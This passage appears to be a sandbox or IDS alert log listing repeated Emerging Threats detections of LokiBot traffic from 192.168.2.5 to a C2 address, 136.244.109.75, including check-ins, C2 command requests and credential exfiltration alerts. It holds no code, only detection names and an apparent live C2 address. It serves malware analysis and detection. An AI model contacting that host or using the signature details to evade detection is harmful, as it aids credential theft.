Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:33.230598
SID:	2021641
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:49.380266
SID:	2024318
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:24.136611
SID:	2024318
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:19.154295
SID:	2024313
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:42.872387
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:02.984312
SID:	2025381
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:45.817567
SID:	2024318
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:45.817567
SID:	2024313
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:49.380266
SID:	2024313
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:50.868001
SID:	2025381
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:01.257517
SID:	2021641
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:07.152097
SID:	2025381
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:52.374211
SID:	2021641
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:44.899678
SID:	2021641
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:58.145128
SID:	2025381
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:14.663282
SID:	2024313
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:37.986053
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:24.136611
SID:	2024313
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:56.772780
SID:	2021641
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:14.663282
SID:	2024318
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:34.395592
SID:	2021641
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:13.442138
SID:	2025381
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:25.351055
SID:	2021641
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:34.754471
SID:	2021641
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:02.659962
SID:	2025381
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:27.158635
SID:	2024313
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:26.814059
SID:	2024313
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:50.877994
SID:	2024312
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:17.867642
SID:	2021641
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:26.814059
SID:	2024318
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:36.230211
SID:	2024313
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:27.158635
SID:	2024318
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:38.899573
SID:	2025381
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:36.230211
SID:	2024318
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:25.655732
SID:	2021641
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:50.877994
SID:	2024317
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:47.882152
SID:	2025381
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:10.084965
SID:	2024318
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:58.235959
SID:	2021641
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:58.145128
SID:	2024318
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:37.986053
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:48.803719
SID:	2024318
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:50.877994
SID:	2025381
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:07.139176
SID:	2021641
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:53.372679
SID:	2021641
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:48.803719
SID:	2024313
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:53.759072
SID:	2021641
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:50.302449
SID:	2025381
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:41.291392
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:24.136611
SID:	2025381
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:41.923839
SID:	2021641
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:10.136681
SID:	2025381
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:58.145128
SID:	2024313
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:10.084965
SID:	2024313
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:13.162928
SID:	2021641
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:17.867642
SID:	2025381
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:38.899573
SID:	2024313
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:38.899573
SID:	2024318
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:52.381113
SID:	2025381
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:31.711088
SID:	2024313
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:13.442138
SID:	2021641
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:20.835118
SID:	2021641
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:20.757055
SID:	2024318
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:01.176692
SID:	2025381
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:31.711088
SID:	2024318
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:11.616140
SID:	2024318
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:08.603347
SID:	2025381
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:20.757055
SID:	2024313
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:11.616140
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:51.797146
SID:	2025381
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:11.695407
SID:	2021641
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:33.230598
SID:	2025381
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:30.128575
SID:	2024318
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:30.128575
SID:	2024313
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:53.924913
SID:	2024318
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:37.366005
SID:	2025381
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:53.924913
SID:	2024313
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:32.922641
SID:	2025381
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:23.842884
SID:	2025381
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:28.314689
SID:	2025381
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:35.861538
SID:	2021641
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:40.424546
SID:	2021641
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:44.899678
SID:	2024318
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:54.967221
SID:	2021641
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:01.257517
SID:	2024318
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:45.817567
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:14.912121
SID:	2025381
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:49.380266
SID:	2021641
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:26.814059
SID:	2021641
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:31.393355
SID:	2021641
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:47.288202
SID:	2025381
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:01.257517
SID:	2024313
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:56.772780
SID:	2024318
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:44.899678
SID:	2024313
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:04.154071
SID:	2021641
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:56.772780
SID:	2024313
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:34.395592
SID:	2024313
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:17.652364
SID:	2021641
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:25.351055
SID:	2024318
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:05.666467
SID:	2025381
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:52.374211
SID:	2024312
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:25.655732
SID:	2024318
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:16:52.374211
SID:	2024317
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:34.754471
SID:	2024313
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:34.754471
SID:	2024318
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:56.686682
SID:	2025381
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:27.158635
SID:	2021641
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:34.395592
SID:	2024318
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:16.164912
SID:	2024318
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:04.956657
SID:	2025381
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:16.378463
SID:	2024313
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:36.230211
SID:	2021641
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:59.618244
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:17:25.655732
SID:	2024313
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 136.244.109.75

Timestamp:	04/17/24-03:18:16.378463
SID:	2024318
